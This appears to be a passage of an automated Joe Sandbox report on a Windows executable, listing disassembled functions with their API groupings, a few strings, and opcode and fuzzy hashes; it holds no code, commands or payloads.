                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                            • String ID:
                                                            • API String ID: 3864802216-0
                                                            • Opcode ID: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                            • Instruction ID: ef09ca5209aec089109618086f4bbac659ec215a4c3be9ceca22c56561636f55
                                                            • Opcode Fuzzy Hash: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                            • Instruction Fuzzy Hash: 5641AEBA61868187E724DF61B454B6ABBA0F798BD2F504136EF8A03B58DF3CD444CB00
                                                            Function 00007FF7EC160BBC Relevance: 10.8, APIs: 7, Instructions: 294COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: c2757373dfb26c044112a110afa25e05e956175428925470acde8015b00b00d1
                                                            • Instruction ID: b267f7d8985003f934bb630fb37e8dcfab5c53d05f1c5f6c3a0822608aa8c73c
                                                            • Opcode Fuzzy Hash: c2757373dfb26c044112a110afa25e05e956175428925470acde8015b00b00d1
                                                            • Instruction Fuzzy Hash: 40C104AAA0C682C6EA61AF15B00037DFB51BF40B84F95413BEA5E07395CF3CE841C726
                                                            Function 00007FF7EC1A09C4 Relevance: 10.7, APIs: 7, Instructions: 248COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                            • String ID:
                                                            • API String ID: 2550207440-0
                                                            • Opcode ID: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
                                                            • Instruction ID: 625b0a51ddd6ec369a4c1bcc20120a97a5af27b54f92a8ad8fe01122f3ba483c
                                                            • Opcode Fuzzy Hash: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
                                                            • Instruction Fuzzy Hash: E6A1B2AAE0860295FB14EB25E5443BCA760FB44B88F99443BDE2E47395DF7CD480C362
                                                            Function 00007FF7EC122100 Relevance: 10.7, APIs: 7, Instructions: 246COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ObjectSelect$BeginCreatePath
                                                            • String ID:
                                                            • API String ID: 3225163088-0
                                                            • Opcode ID: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                            • Instruction ID: 36c25642b979b7df9bf5517a17ffc592cd09d3fdbd2922957d9d9135d95883ab
                                                            • Opcode Fuzzy Hash: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                            • Instruction Fuzzy Hash: 2CA1A0BAA086C087D7749F19B40076EFB75FB86B94F944126DA8913B68CB3CD452CF12
                                                            Function 00007FF7EC1CFB28 Relevance: 10.7, APIs: 7, Instructions: 212windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Enabled
                                                            • String ID:
                                                            • API String ID: 3694350264-0
                                                            • Opcode ID: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                            • Instruction ID: c86b626a9672c389f82eb3f0fbe85c42de1f94c3a031a0ef2f5771929aafe3d7
                                                            • Opcode Fuzzy Hash: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                            • Instruction Fuzzy Hash: C591B1A9E1868686FB78AB15E454BB9E391AF44B84F944033EA4D03795CF3CE491C323
                                                            Function 00007FF7EC199034 Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                            • Instruction ID: 3af228d785ab32dda113064467808417099a1d9052123bc6d7de9b8de767f70c
                                                            • Opcode Fuzzy Hash: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                            • Instruction Fuzzy Hash: 0F51A29AA0D2D156F7619B75610077DAFA2FB4ABD0F8C80B6DA4D07B46CA39E450C332
                                                            Function 00007FF7EC1ADBF0 Relevance: 10.6, APIs: 7, Instructions: 137networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Internet$CloseConnectErrorEventHandleHttpLastOpenRequest
                                                            • String ID:
                                                            • API String ID: 3401586794-0
                                                            • Opcode ID: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                            • Instruction ID: 6e2892992cc2d2850bfdbfe7c25c4f0981d16d76c7236a4dc71bdc7ae5004be9
                                                            • Opcode Fuzzy Hash: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                            • Instruction Fuzzy Hash: 035193AA608B4286F714FF21B940BEEA7A0FB48B88F984036DE0D17B58DF39D455C751
                                                            Function 00007FF7EC194860 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124comlibraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: From$ErrorModeProg$AddressCreateFreeInstanceProcStringTasklstrcmpi
                                                            • String ID: DllGetClassObject
                                                            • API String ID: 668425406-1075368562
                                                            • Opcode ID: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                            • Instruction ID: a5648c5a01283728780a3b2a82f5b722bced0516230f9a5bb7dd12f81b477df9
                                                            • Opcode Fuzzy Hash: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                            • Instruction Fuzzy Hash: C2519CAAA08B8682EB14AF1AF540369E761FB44B84F808036DF4D57B45DF7CF064C316
                                                            Function 00007FF7EC1CA884 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                            • String ID:
                                                            • API String ID: 161812096-0
                                                            • Opcode ID: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
                                                            • Instruction ID: 4dbbdaeb84b68b6788466622b9b2ee2ae4c68bc3b9884ad68a4d33edc1d3d493
                                                            • Opcode Fuzzy Hash: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
                                                            • Instruction Fuzzy Hash: 7941AE7AA04B4585EB50DF22E8807AC77B0FB45B88F954032DE4E07768CF38E455C711
                                                            Function 00007FF7EC1C15C4 Relevance: 10.6, APIs: 7, Instructions: 90registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                            • String ID:
                                                            • API String ID: 395352322-0
                                                            • Opcode ID: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                            • Instruction ID: 10a084ea4a4fef0289efa16f568effb7e057f6526bf45030dfc335c1ec9de23b
                                                            • Opcode Fuzzy Hash: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                            • Instruction Fuzzy Hash: 7841C17AA08B8586E720DF11F4547EAA3A0FB89784FD40132FA8D07A58CF3DD149CB11
                                                            Function 00007FF7EC194FCC Relevance: 10.6, APIs: 7, Instructions: 76memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: 470201b7a7510a06dd913372f332e36f0e26382b67c565ba0de27237d0cac92a
                                                            • Instruction ID: 5b84b3706650241e572f2e159276feb66a4353e4d77eeba99b611fbcd98a8b47
                                                            • Opcode Fuzzy Hash: 470201b7a7510a06dd913372f332e36f0e26382b67c565ba0de27237d0cac92a
                                                            • Instruction Fuzzy Hash: 1D318CA9A08B4685DA20AF16F444369B7A1FB84FD1F888237DA5E13794CE3CE484C755
                                                            Function 00007FF7EC194EB0 Relevance: 10.6, APIs: 7, Instructions: 74memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: AllocByteCharMultiStringWide
                                                            • String ID:
                                                            • API String ID: 3603722519-0
                                                            • Opcode ID: cf43f2be6eb4bd68818497ac57658916f6485d2528bb62b4acf40de2ec05e3b3
                                                            • Instruction ID: 09e1cad00eb480987aa9d392a4561de64a3d03f8565ac24c9728fdd27fa9d853
                                                            • Opcode Fuzzy Hash: cf43f2be6eb4bd68818497ac57658916f6485d2528bb62b4acf40de2ec05e3b3
                                                            • Instruction Fuzzy Hash: 5B3160B6A08A8689DB20AF16F444369B7A1FB44F91F884277DE5E03795DF3CE484C711
                                                            Function 00007FF7EC1CAEDC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: Msctls_Progress32
                                                            • API String ID: 1025951953-3636473452
                                                            • Opcode ID: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                            • Instruction ID: ef0f0e45f450b5f256efefa7b59cfbb1af856d380b8226f848ce8549fd165d79
                                                            • Opcode Fuzzy Hash: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                            • Instruction Fuzzy Hash: B5317ABA60868187E3609F65F494B1AB761EB88790F50913AEB9803B59CF3CD845CF11
                                                            Function 00007FF7EC19F9EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65pipeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CreateHandlePipe
                                                            • String ID: nul
                                                            • API String ID: 1424370930-2873401336
                                                            • Opcode ID: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                            • Instruction ID: 6d47d7c00eb08e0b42468bc78d71dda82cf7953f1de1f2ac71c8a17a3b87d330
                                                            • Opcode Fuzzy Hash: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                            • Instruction Fuzzy Hash: 242186A5A18B8691E7106B1CF014379E3A1FB85779F904332DA6E067D4DF7CD004C712
                                                            Function 00007FF7EC19FAFC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65pipeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CreateHandlePipe
                                                            • String ID: nul
                                                            • API String ID: 1424370930-2873401336
                                                            • Opcode ID: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                            • Instruction ID: 8681bb874bf4f9ae6dfd998f070030fed9345a38667755ae756d9886b2bab95c
                                                            • Opcode Fuzzy Hash: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                            • Instruction Fuzzy Hash: A331A4B6A18A8691EB10AF28E414379A2A1EB46B79F904332DA7D067D4DF3CD045C712
                                                            Function 00007FF7EC128F40 Relevance: 9.2, APIs: 6, Instructions: 246COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Rect$Client$Window$MetricsScreenSystem
                                                            • String ID:
                                                            • API String ID: 3220332590-0
                                                            • Opcode ID: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                            • Instruction ID: 5f4b803415211a8a9e44538b5b338445b5e1fe5eb6f7066596727846dab5aea6
                                                            • Opcode Fuzzy Hash: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                            • Instruction Fuzzy Hash: 60A106AFB18253C5E728AF75A4047BDB3A0FF04B58F541536DE1947A94EA3D9801E332
                                                            Function 00007FF7EC14A054 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 492COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: f$p
                                                            • API String ID: 3215553584-1290815066
                                                            • Opcode ID: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
                                                            • Instruction ID: b4e91aad5ddcc62c330b5f47ef76ab1b6bba5f9edcac046e55a2c5e5d6aaf4cf
                                                            • Opcode Fuzzy Hash: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
                                                            • Instruction Fuzzy Hash: E712A5AAE0C16385FB20BB14B04477AE662FB40754FD94233E69D0E5C4EB3DE561DB22
                                                            Function 00007FF7EC18AD30 Relevance: 9.2, APIs: 6, Instructions: 193memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                            • String ID:
                                                            • API String ID: 3859894641-0
                                                            • Opcode ID: e8b24930f51ba047eb7d77df0b47a13309a91a72afe8362d3ff3918905f513c3
                                                            • Instruction ID: 55d8b549e16ac2654719fd0f0d5daa861bec946e6ca50a9f7d98e4407241af55
                                                            • Opcode Fuzzy Hash: e8b24930f51ba047eb7d77df0b47a13309a91a72afe8362d3ff3918905f513c3
                                                            • Instruction Fuzzy Hash: 9C712CBA90C64282EB28BB25A65427CA260FF45B80F944537D74E0F795DE3CE971C327
                                                            Function 00007FF7EC121E04 Relevance: 9.1, APIs: 6, Instructions: 108COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
